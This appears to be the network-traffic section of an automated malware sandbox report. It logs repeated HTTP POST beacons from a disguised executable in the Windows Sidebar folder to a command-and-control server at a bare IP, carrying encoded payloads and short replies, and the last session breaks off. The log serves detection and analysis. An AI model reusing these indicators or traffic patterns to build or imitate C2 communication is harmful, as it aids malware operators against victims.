                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:28.057444096 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2560
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:28.409297943 CET2560OUTData Raw: 50 55 5f 59 5b 5a 51 58 5e 5e 51 57 50 5a 5a 51 59 54 58 49 5b 50 52 5f 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PU_Y[ZQX^^QWPZZQYTXI[PR_[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9)6$V#4$]+8$(C8)_+",?)"/X<;;'&(?!Y""Z)


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                50192.168.2.749932121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:29.217879057 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:29.565673113 CET1452OUTData Raw: 50 56 5a 5a 5e 50 54 5d 5e 5e 51 57 50 5f 5a 5f 59 50 58 45 5b 50 52 5f 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PVZZ^PT]^^QWP_Z_YPXE[PR_[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9*,"_'<-Q 4])<+9^6?'S(",??3-*?!Y""Z)1
                                                Dec 5, 2024 16:03:30.543726921 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:30.776320934 CET380INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:30 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 20 13 20 2d 0b 06 37 04 01 54 2d 00 0a 5a 30 09 3e 40 26 30 27 03 27 2e 36 0d 26 02 30 0d 36 28 27 5d 22 2a 33 59 20 01 27 11 26 37 28 46 0c 1d 22 11 30 06 26 0f 3e 39 2b 0c 2d 3c 21 08 29 1d 35 02 3a 10 2a 16 2a 0d 2e 0e 3e 3a 39 0f 25 3b 30 13 30 39 26 16 28 23 28 07 24 1f 20 53 00 14 26 0c 3d 1f 39 57 3e 01 2a 01 35 05 27 09 28 05 2e 59 26 15 35 0e 26 1a 01 1a 32 2a 3c 57 37 27 34 0d 29 10 25 05 31 12 2b 02 3e 09 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: -7T-Z0>@&0''.6&06(']"*3Y '&7(F"0&>9+-<!)5:**.>:9%;009&(#($ S&=9W>*5'(.Y&5&2*<W7'4)%1+>&\! W=YV


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                51192.168.2.749933121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:29.338665009 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:29.690486908 CET2564OUTData Raw: 55 54 5a 5b 5b 5d 54 53 5e 5e 51 57 50 59 5a 5d 59 53 58 48 5b 50 52 5a 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UTZ[[]TS^^QWPYZ]YSXH[PRZ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:*63/&4?)+Y+&4= <?T=2+X*+ '9<!Y""Z))
                                                Dec 5, 2024 16:03:30.658492088 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:30.892529964 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:30 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                52192.168.2.749939121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:31.135479927 CET447OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:03:31.487404108 CET2564OUTData Raw: 55 54 5a 5e 5e 5c 51 59 5e 5e 51 57 50 5b 5a 50 59 51 58 41 5b 53 52 5e 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UTZ^^\QY^^QWP[ZPYQXA[SR^[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9>60=U"' _)8\<X*?5?+S*!3^*+$]$=!U(!Y""Z)!
                                                Dec 5, 2024 16:03:32.468111992 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:32.700535059 CET151INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:32 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                53192.168.2.749941121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:32.951456070 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:33.310120106 CET2564OUTData Raw: 50 52 5a 5b 5b 5a 54 5b 5e 5e 51 57 50 5f 5a 58 59 53 58 45 5b 51 52 50 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PRZ[[ZT[^^QWP_ZXYSXE[QRP[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:>.X0Y248_)+?6$Y*";T=1+^?( ]$=+?!Y""Z)1
                                                Dec 5, 2024 16:03:34.277513981 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:34.512433052 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:34 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                54192.168.2.749946121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:34.760946035 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:35.112457037 CET2564OUTData Raw: 50 53 5a 5b 5b 5f 54 59 5e 5e 51 57 50 5f 5a 50 59 5d 58 41 5b 57 52 5f 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PSZ[[_TY^^QWP_ZPY]XA[WR_[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9Y)<2\$,=#48Y>(/+7):;Y6<7=Y(^,^&=9W*/!Y""Z)1


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                55192.168.2.749952121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:35.915584087 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:36.268610954 CET1452OUTData Raw: 55 52 5a 5a 5e 5d 51 5e 5e 5e 51 57 50 5f 5a 50 59 51 58 48 5b 52 52 5d 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: URZZ^]Q^^^QWP_ZPYQXH[RR][\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:=0 '4>;,\<'*9'X /4*3Z</&>!V?!Y""Z)1
                                                Dec 5, 2024 16:03:37.236725092 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:37.468597889 CET380INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:37 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 20 59 22 3e 31 02 20 29 27 52 2d 2e 38 5a 33 33 2e 09 26 55 30 11 25 3d 21 1c 26 02 24 0a 36 05 2b 17 22 17 34 01 23 06 20 04 24 1d 28 46 0c 1d 21 01 33 06 2e 0c 29 39 3c 57 38 2f 21 0b 3e 0d 26 5b 2d 07 31 0d 29 0a 26 0c 3c 07 04 56 27 2b 33 07 27 3a 2d 03 2b 55 2f 5e 27 25 20 53 00 14 25 19 2a 31 21 11 3d 06 2a 02 21 02 30 1c 3c 05 26 1d 25 5d 29 0c 26 0a 38 01 25 17 23 0e 20 34 23 54 2b 2e 21 04 32 02 2b 04 3d 23 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: Y">1 )'R-.8Z33.&U0%=!&$6+"4# $(F!3.)9<W8/!>&[-1)&<V'+3':-+U/^'% S%*1!=*!0<&%])&8%# 4#T+.!2+=#&\! W=YV


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                56192.168.2.749953121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:36.252336979 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:36.596806049 CET2564OUTData Raw: 50 53 5a 5d 5e 5b 51 59 5e 5e 51 57 50 5e 5a 5d 59 57 58 40 5b 55 52 5d 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PSZ]^[QY^^QWP^Z]YWX@[UR][\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:)?5'/T7$7)<X<4>)?_5/?>(?8'>*/!Y""Z)5
                                                Dec 5, 2024 16:03:37.577081919 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:37.812661886 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:37 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                57192.168.2.749959121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:38.057252884 CET447OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:03:38.409250021 CET2564OUTData Raw: 50 53 5a 58 5e 5e 54 5a 5e 5e 51 57 50 5d 5a 50 59 53 58 42 5b 50 52 5e 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PSZX^^TZ^^QWP]ZPYSXB[PR^[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:)?6_':48^>+$\<))^!Y$)7Y(;<Y'>5+!Y""Z)
                                                Dec 5, 2024 16:03:39.383625984 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:39.618520975 CET151INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:39 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                58192.168.2.749965121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:39.982846022 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:40.331140041 CET2564OUTData Raw: 55 51 5a 5e 5b 5f 54 5f 5e 5e 51 57 50 52 5a 5f 59 50 58 40 5b 53 52 5d 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UQZ^[_T_^^QWPRZ_YPX@[SR][\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9==$/.4$]*]/(/*<!Y;>$<03+!Y""Z)
                                                Dec 5, 2024 16:03:41.304776907 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:41.540502071 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:41 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                59192.168.2.749970121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:41.775845051 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:42.128026009 CET2564OUTData Raw: 50 51 5a 59 5b 5c 54 5b 5e 5e 51 57 50 58 5a 5f 59 5d 58 42 5b 5e 52 5b 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PQZY[\T[^^QWPXZ_Y]XB[^R[[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9)?='<%T4+><+>94 ?$=2((+ ]3.!*?!Y""Z)-


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                60192.168.2.749971121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:42.594403982 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:42.940788984 CET1452OUTData Raw: 50 52 5f 5e 5e 58 51 5d 5e 5e 51 57 50 5d 5a 59 59 55 58 44 5b 50 52 5b 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PR_^^XQ]^^QWP]ZYYUXD[PR[[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9Y=?>]$?=T (X>+;?*_(!<4(2?++ 0W?!Y""Z)
                                                Dec 5, 2024 16:03:43.916599989 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:44.152575016 CET380INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:43 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 20 59 20 5b 2e 5a 37 04 23 1f 2c 2e 38 58 33 30 32 41 27 23 38 10 31 13 2a 08 27 28 33 52 22 3b 27 5a 21 39 0d 59 37 3f 02 04 27 0d 28 46 0c 1d 22 5f 24 16 32 0d 3d 07 02 55 2f 3f 39 40 29 23 25 07 39 00 03 08 29 55 21 57 3c 39 21 0d 32 38 02 1d 24 03 25 03 2b 0d 05 12 27 0f 20 53 00 14 26 0c 3d 31 29 52 2a 2f 3d 11 22 12 30 50 2b 15 39 06 26 28 2a 1d 25 1a 33 5d 25 29 0a 54 20 34 2b 1d 3e 2e 2d 04 27 3f 34 11 29 33 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: Y [.Z7#,.8X302A'#81*'(3R";'Z!9Y7?'(F"_$2=U/?9@)#%9)U!W<9!28$%+' S&=1)R*/="0P+9&(*%3]%)T 4+>.-'?4)3&\! W=YV


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                61192.168.2.749972121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:42.741384983 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:43.096882105 CET2564OUTData Raw: 55 52 5a 53 5e 5a 51 5e 5e 5e 51 57 50 52 5a 59 59 53 58 48 5b 5f 52 59 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
